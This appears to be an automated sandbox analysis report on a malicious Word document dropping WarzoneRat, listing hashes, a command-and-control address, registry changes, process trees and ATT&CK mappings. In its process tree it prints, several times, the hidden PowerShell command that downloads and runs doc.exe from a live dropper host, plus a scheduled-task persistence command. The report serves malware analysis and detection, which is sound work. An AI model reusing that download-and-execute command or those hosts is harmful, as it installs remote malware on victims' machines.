warzonerat | 7b5572ae246bcd3f6ee0375e1e7a8c8d4287dae4ca1803d72ae427d8ecc93a32

Analysis

max time kernel
149s
max time network
136s
platform
windows7_x64
resource
win7-en-20210920
submitted
28-09-2021 09:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

catalogue_2021_samples_list_revise_ol.doc
Size

535KB
MD5

84c45c2b0e94b8d1d064e739150ba84c
SHA1

f6a98ac4e50a89495626b5eaebb85d1116554faa
SHA256

7b5572ae246bcd3f6ee0375e1e7a8c8d4287dae4ca1803d72ae427d8ecc93a32
SHA512

8fb31fc4147af9e1568c9799307b3d5a8b4a3ed607e14061769f239ce4dd9b10464b9f878900c8777f1550b9a9e8cdfb7901bb22d6fa958f9761a4831ddf6162

Score

10^/10

warzonerat infostealer rat suricata

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

httP://13.92.100.208/doc/doc.exe

Extracted

Family

warzonerat

152.67.253.163:5300

Signatures

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	332	1112	powershell.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1304	1112	powershell.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	432	1112	powershell.exe	WINWORD.EXE

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat
suricata: ET MALWARE Possible Malicious Macro DL EXE Feb 2016
suricata: ET MALWARE Possible Malicious Macro DL EXE Feb 2016
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata

Warzone RAT Payload 4 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/532-101-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral1/memory/532-102-0x0000000000405CE2-mapping.dmp	warzonerat
behavioral1/memory/532-110-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral1/memory/1092-112-0x0000000000370000-0x00000000003D0000-memory.dmp	warzonerat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 432 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

doc.exedoc.exedoc.exe

pid process

292 doc.exe
680 doc.exe
532 doc.exe
Loads dropped DLL 7 IoCs

Processes:

powershell.exepowershell.exeWerFault.exe

pid process

432 powershell.exe
332 powershell.exe
1092 WerFault.exe
1092 WerFault.exe
1092 WerFault.exe
1092 WerFault.exe
1092 WerFault.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

doc.exe

description pid process target process

PID 292 set thread context of 532 292 doc.exe doc.exe
Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1092 680 WerFault.exe doc.exe
Office loads VBA resources, possible macro or embedded object present
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

836 schtasks.exe

flow	pid	process
5	432	powershell.exe

pid	process
292	doc.exe
680	doc.exe
532	doc.exe

pid	process
432	powershell.exe
332	powershell.exe
1092	WerFault.exe
1092	WerFault.exe
1092	WerFault.exe
1092	WerFault.exe
1092	WerFault.exe

description	pid	process	target process
PID 292 set thread context of 532	292	doc.exe	doc.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

pid	pid_target	process	target process
1092	680	WerFault.exe	doc.exe

pid	process
836	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1112 WINWORD.EXE

pid	process
1112	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exeWerFault.exe

pid	process
332	powershell.exe
432	powershell.exe
1304	powershell.exe
432	powershell.exe
432	powershell.exe
332	powershell.exe
332	powershell.exe
1092	WerFault.exe
1092	WerFault.exe
1092	WerFault.exe
1092	WerFault.exe
1092	WerFault.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exeWerFault.exe

description	pid	process
Token: SeDebugPrivilege	332	powershell.exe
Token: SeDebugPrivilege	432	powershell.exe
Token: SeDebugPrivilege	1304	powershell.exe
Token: SeDebugPrivilege	1092	WerFault.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

WINWORD.EXE

pid process

1112 WINWORD.EXE
1112 WINWORD.EXE
1112 WINWORD.EXE
1112 WINWORD.EXE

pid	process
1112	WINWORD.EXE
1112	WINWORD.EXE
1112	WINWORD.EXE
1112	WINWORD.EXE

Suspicious use of WriteProcessMemory 44 IoCs

Processes:

WINWORD.EXEpowershell.exepowershell.exedoc.exedoc.exe

description	pid	process	target process
PID 1112 wrote to memory of 332	1112	WINWORD.EXE	powershell.exe
PID 1112 wrote to memory of 332	1112	WINWORD.EXE	powershell.exe
PID 1112 wrote to memory of 332	1112	WINWORD.EXE	powershell.exe
PID 1112 wrote to memory of 332	1112	WINWORD.EXE	powershell.exe
PID 1112 wrote to memory of 1304	1112	WINWORD.EXE	powershell.exe
PID 1112 wrote to memory of 1304	1112	WINWORD.EXE	powershell.exe
PID 1112 wrote to memory of 1304	1112	WINWORD.EXE	powershell.exe
PID 1112 wrote to memory of 1304	1112	WINWORD.EXE	powershell.exe
PID 1112 wrote to memory of 432	1112	WINWORD.EXE	powershell.exe
PID 1112 wrote to memory of 432	1112	WINWORD.EXE	powershell.exe
PID 1112 wrote to memory of 432	1112	WINWORD.EXE	powershell.exe
PID 1112 wrote to memory of 432	1112	WINWORD.EXE	powershell.exe
PID 432 wrote to memory of 292	432	powershell.exe	doc.exe
PID 432 wrote to memory of 292	432	powershell.exe	doc.exe
PID 432 wrote to memory of 292	432	powershell.exe	doc.exe
PID 432 wrote to memory of 292	432	powershell.exe	doc.exe
PID 332 wrote to memory of 680	332	powershell.exe	doc.exe
PID 332 wrote to memory of 680	332	powershell.exe	doc.exe
PID 332 wrote to memory of 680	332	powershell.exe	doc.exe
PID 332 wrote to memory of 680	332	powershell.exe	doc.exe
PID 1112 wrote to memory of 1912	1112	WINWORD.EXE	splwow64.exe
PID 1112 wrote to memory of 1912	1112	WINWORD.EXE	splwow64.exe
PID 1112 wrote to memory of 1912	1112	WINWORD.EXE	splwow64.exe
PID 1112 wrote to memory of 1912	1112	WINWORD.EXE	splwow64.exe
PID 292 wrote to memory of 836	292	doc.exe	schtasks.exe
PID 292 wrote to memory of 836	292	doc.exe	schtasks.exe
PID 292 wrote to memory of 836	292	doc.exe	schtasks.exe
PID 292 wrote to memory of 836	292	doc.exe	schtasks.exe
PID 292 wrote to memory of 532	292	doc.exe	doc.exe
PID 292 wrote to memory of 532	292	doc.exe	doc.exe
PID 292 wrote to memory of 532	292	doc.exe	doc.exe
PID 292 wrote to memory of 532	292	doc.exe	doc.exe
PID 292 wrote to memory of 532	292	doc.exe	doc.exe
PID 292 wrote to memory of 532	292	doc.exe	doc.exe
PID 292 wrote to memory of 532	292	doc.exe	doc.exe
PID 292 wrote to memory of 532	292	doc.exe	doc.exe
PID 292 wrote to memory of 532	292	doc.exe	doc.exe
PID 292 wrote to memory of 532	292	doc.exe	doc.exe
PID 292 wrote to memory of 532	292	doc.exe	doc.exe
PID 292 wrote to memory of 532	292	doc.exe	doc.exe
PID 680 wrote to memory of 1092	680	doc.exe	WerFault.exe
PID 680 wrote to memory of 1092	680	doc.exe	WerFault.exe
PID 680 wrote to memory of 1092	680	doc.exe	WerFault.exe
PID 680 wrote to memory of 1092	680	doc.exe	WerFault.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\catalogue_2021_samples_list_revise_ol.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1112

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\Admin\AppData\Roaming\doc.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\doc.exe'"
2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:332

C:\Users\Admin\AppData\Roaming\doc.exe
"C:\Users\Admin\AppData\Roaming\doc.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 680 -s 696
4⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1092

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\Admin\AppData\Roaming\doc.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\doc.exe'"
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1304

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\Admin\AppData\Roaming\doc.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\doc.exe'"
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:432

C:\Users\Admin\AppData\Roaming\doc.exe
"C:\Users\Admin\AppData\Roaming\doc.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:292

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\maBdogbw" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE7CE.tmp"
4⤵
- Creates scheduled task(s)
PID:836

C:\Users\Admin\AppData\Roaming\doc.exe
"C:\Users\Admin\AppData\Roaming\doc.exe"
4⤵
- Executes dropped EXE
PID:532

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1912

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
b84828865be53111c19b02b7a174338d

SHA1
077831cb10f8a2212a20b8e7a3efe98f10423d25

SHA256
1ad67198ab117dd3f5027ea41e5608bf4889ae61edc2dcdf7a125524f4f98a71

SHA512
c40f747b80fe1c1e5a89d0b9af83ae2b1692b2213436654e9c5b50628aec48e25953d06fcd2f6eae3f72f85e2b6025d64786404e33a2ff7196333e81803dd54f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
b84828865be53111c19b02b7a174338d

SHA1
077831cb10f8a2212a20b8e7a3efe98f10423d25

SHA256
1ad67198ab117dd3f5027ea41e5608bf4889ae61edc2dcdf7a125524f4f98a71

SHA512
c40f747b80fe1c1e5a89d0b9af83ae2b1692b2213436654e9c5b50628aec48e25953d06fcd2f6eae3f72f85e2b6025d64786404e33a2ff7196333e81803dd54f

Download Submit
C:\Users\Admin\AppData\Roaming\doc.exe
MD5
d8bc91e846e3d624814d4557681f33ad

SHA1
873f451438efce56d2bce9dd9b44beefb2c6a28b

SHA256
30fab10aa23c7dbb0b66b3b0491582f2bb6930e7bce11a078c3093ae4b40dc7e

SHA512
78909d822cb9706155b77b85cf1f9a274be7155c61ee71a49555932a11ba05311f308760b6baed3338cfcba6ec1647f010e5b13e25bde839f67033cd20739a24

Download Submit
C:\Users\Admin\AppData\Roaming\doc.exe
MD5
d8bc91e846e3d624814d4557681f33ad

SHA1
873f451438efce56d2bce9dd9b44beefb2c6a28b

SHA256
30fab10aa23c7dbb0b66b3b0491582f2bb6930e7bce11a078c3093ae4b40dc7e

SHA512
78909d822cb9706155b77b85cf1f9a274be7155c61ee71a49555932a11ba05311f308760b6baed3338cfcba6ec1647f010e5b13e25bde839f67033cd20739a24

Download Submit
